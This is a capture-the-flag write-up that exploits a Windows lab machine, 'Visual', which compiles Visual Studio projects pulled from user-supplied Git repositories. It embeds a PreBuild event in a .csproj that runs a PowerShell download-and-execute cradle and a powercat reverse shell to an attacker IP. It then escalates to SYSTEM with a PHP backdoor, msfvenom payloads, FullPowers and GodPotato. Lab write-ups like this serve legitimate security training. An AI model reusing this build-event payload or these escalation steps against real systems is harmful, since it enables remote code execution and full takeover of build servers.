Week 1. Visual
TL;DR
This is a Windows 2019 server machine running an Apache 2.4.56 server on port 80. A web app recovers visual studio projects from external gits, compiles them and stores them in the server. The web application can be abused leveraging "pre events" on visual studio project files. Once inside the machine, we can move laterally to a local service user and restore its privileges with Full Powers binary. Finally, system shell is obtained with God Potato.
KEYWORDS
Git, Visual Studio, pre/post events, Full Powers, God Potato.
REFERENCES
https://www.oreilly.com/library/view/version-control-with/9781449345037/ch04.html
https://learn.microsoft.com/es-es/dotnet/core/tools/dotnet-sln
https://github.com/itm4n/FullPowers
https://github.com/BeichenDream/GodPotato
ENUMERATION
Port scan.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-02 06:42 EDT
Stats: 0:04:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for 10.129.131.71
Host is up, received user-set (0.20s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 495.11 secondsEnumerate the open ports.
> nmap $target -p80 -sV -sC -Pn -v
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-02 06:53 EDT
Nmap scan report for 10.129.131.71
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Visual - Revolutionizing Visual Studio Builds
Nmap done: 1 IP address (1 host up) scanned in 13.43 secondsThere is an Apache 2.4.56 web server running on port 80. We inspect the site with Firefox, a web app which compiles and stores visual studio projects comes into view. After supplying a Git repository link, the app pulls the files, compiles the Net 6.0 and C# projects and uploads them in the site.
USER
Our goal is to prepare a local HTTP Git repository serving a Visual Studio solution. For this, we start making a directory called repo and create a new Visual Studio solution called repo.sln
> mkdir repo
> cd repo
> dotnet new sln -n repo
The template "Solution File" was created successfully.From the repo directory, create a new project (specifically, a console C# app) called myapp
> dotnet new console -o myapp
The template "Console App" was created successfully.
Processing post-creation actions...
Running 'dotnet restore' on /home/kali/htb/repo/myapp/myapp.csproj...
Determining projects to restore...
Restored /home/kali/htb/repo/myapp/myapp.csproj (in 106 ms).
Restore succeeded.This will generate a new folder called myapp containing a project file called myapp.csproj and a C# source file called Program.cs. Finally, we add the C# project to the Visual Studio solution.
> dotnet sln repo.sln add myapp/myapp.csproj
Project `myapp/myapp.csproj` added to the solution.Once Visual Studio part is finished, we need to initialize a Git repository in the repo directory and serve it via HTTP. For this, firstly initialize the Git repository on directory repo
> cd repo
> git initThe directory repo/.git is created after this. The .git directory contains the repository files and metadata. Next step is to add all files on the repo directory to the git.
> git add .Check there are no more untracked files in the Git repo to be added.
> git status
On branch master
No commits yet
Changes to be committed:
(use "git rm --cached <file>..." to unstage)
new file: myapp/Program.cs
new file: myapp/myapp.csproj
new file: myapp/obj/myapp.csproj.nuget.dgspec.json
new file: myapp/obj/myapp.csproj.nuget.g.props
new file: myapp/obj/myapp.csproj.nuget.g.targets
new file: myapp/obj/project.assets.json
new file: myapp/obj/project.nuget.cache
new file: repo.slnCommit changes.
> git commit -m 'first commit'
[master (root-commit) c1149ed] first commit
Committer: Kali <kali@kali>
Your name and email address were configured automatically based
on your username and hostname. Please check that they are accurate.
You can suppress this message by setting them explicitly. Run the
following command and follow the instructions in your editor to edit
your configuration file:
git config --global --edit
After doing this, you may fix the identity used for this commit with:
git commit --amend --reset-author
8 files changed, 254 insertions(+)
create mode 100644 myapp/Program.cs
create mode 100644 myapp/myapp.csproj
create mode 100644 myapp/obj/myapp.csproj.nuget.dgspec.json
create mode 100644 myapp/obj/myapp.csproj.nuget.g.props
create mode 100644 myapp/obj/myapp.csproj.nuget.g.targets
create mode 100644 myapp/obj/project.assets.json
create mode 100644 myapp/obj/project.nuget.cache
create mode 100644 repo.sln
Finally, move to the .git directory and update server info.
> git update-server-infoNow the git is ready to be served on HTTP. We can test it, move to .git and serve the repository with a Python HTTP server. Then, in the web app, enter the local machine IP. Shortly after, the app starts downloading the C# files and uploading them into the server. Once they are complied, they are stored in a random folder and the app supplies the user with the resulting URL.
> cd .git
> python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.131.71 - [02/Oct/2023 06:35:21] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:21] "GET /HEAD HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:21] "GET /objects/c1/149ed1d5d95b61620419e6edcd044c2e011dc3 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:21] "GET /objects/9c/bbf0dddb9793273a5f11cb16638df6e5f75f79 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:21] "GET /objects/6d/14b52ecedd9bdefeb99b8df164c512076e6706 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:21] "GET /objects/33/4fb98c99505b620c51b1df5906d431b2c39b46 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/17/03899202f0c1e462462aee89e21b94d14dfcc5 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/40/c60dd4c884340c455eab8a0020f7c681a4e76c HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/05/0a823dc452240c816714aa0e67132cf2c02fc8 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/fc/4d85547b5061c57acf144aed69cdcf221184a7 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/d5/c27794d9d18d997cd9b5a997bcfccda6957ccb HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/3d/c06ef3cc4057524bf5d2cd49936dff789cebe8 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/49/ca051d7448fd4227ddd3d50b1fc3a7bb01a665 HTTP/1.1" 200 -
10.129.131.71 - [02/Oct/2023 06:35:22] "GET /objects/64/6073d646e06c42705eaab844dcf6117f0662a9 HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.Once we are sure our Git repo works, we have to find a way to make the server execute the code after compiling it. This can be done manipulating "pre" and "post" events in the C# .csproj project file.
These events are triggered by the msbuild compiler before or after the compiling process ends. We will add a "pre event", calling a powercat reverse shell before the building process begins. Just create any simple Program.cs source file and, in the myapp.csproj file, add the "pre event".
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
<Exec Command="powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.14.59:8080/powercat.ps1');powercat -c 10.10.14.59 -p 1919 -e cmd" />
</Target>
</Project>After this, add again all files to Git, commit, update server info and restart the Python HTTP server (from .git directory).
> cd repo
> git add .
> git commit -m 'commit'
> cd .git
> git update-server-info
> python3 -m http.server 80Start another Python HTTP serving powercat.ps1 and start a listener. Enter red box IP in the web app URL box, when the C# files are pulled and processed a reverse shell is received on port 1919.
SYSTEM
Enumerate the system.
> systeminfo
Host Name: VISUAL
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PCEnumerate current user privileges.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledAfter enumeration, we discover we have write access to web root folder so if we copy a .php shell in the web root, we could move laterally to the user who is running the web server. Let's check who is running the HTTP service.
> wmic service where started=true get name,startname
Name StartName
ApacheHTTPServer NT AUTHORITY\Local Service
BFE NT AUTHORITY\LocalService
BrokerInfrastructure LocalSystem
camsvc LocalSystem
CDPSvc NT AUTHORITY\LocalServiceThe user turns to be ApacheHTTPServer, who is nt authority\local service. Copy a simple-backdoor.php and an EXE msfvenom payload into the web root folder (download with certutil). Then start a listener and execute the payload using a browser and the simple-backdoor.php. A reverse shell for user nt authority\local service is received on the listener.
Enumerate ApacheHTTPService user's permissions
> whoami
nt authority\local service
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledIt's the same as before, seems we have not progressed so much; however, there is a tool which restores original privileges (including impersonation) to local services account.
Download and use fullpowers.exe (https://github.com/itm4n/FullPowers) on the local service account shell, verify impersonation privilege is restored afterwards.
> fp.exe
[+] Started dummy thread with id 2388
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledOnce we have impersonation privilege restored, we can try all range of potatoes. The working one is God Potato (https://github.com/BeichenDream/GodPotato). We need another msfvenom shell to execute with God Potato.
> godpotato-net4.exe -cmd "cmd /c shell.exe"
[*] CombaseModule: 0x140716178145280
[*] DispatchTable: 0x140716180451440
[*] UseProtseqFunction: 0x140716179827616
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\31962564-9378-49a1-bceb-caf0e761bab8\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000802-1194-ffff-78e9-866782c9261c
[*] DCOM obj OXID: 0x1824f813e9024d03
[*] DCOM obj OID: 0x5c3d6b4cfc42b15a
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 852 Token:0x816 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2932A system shell is received on the listener.
Last updated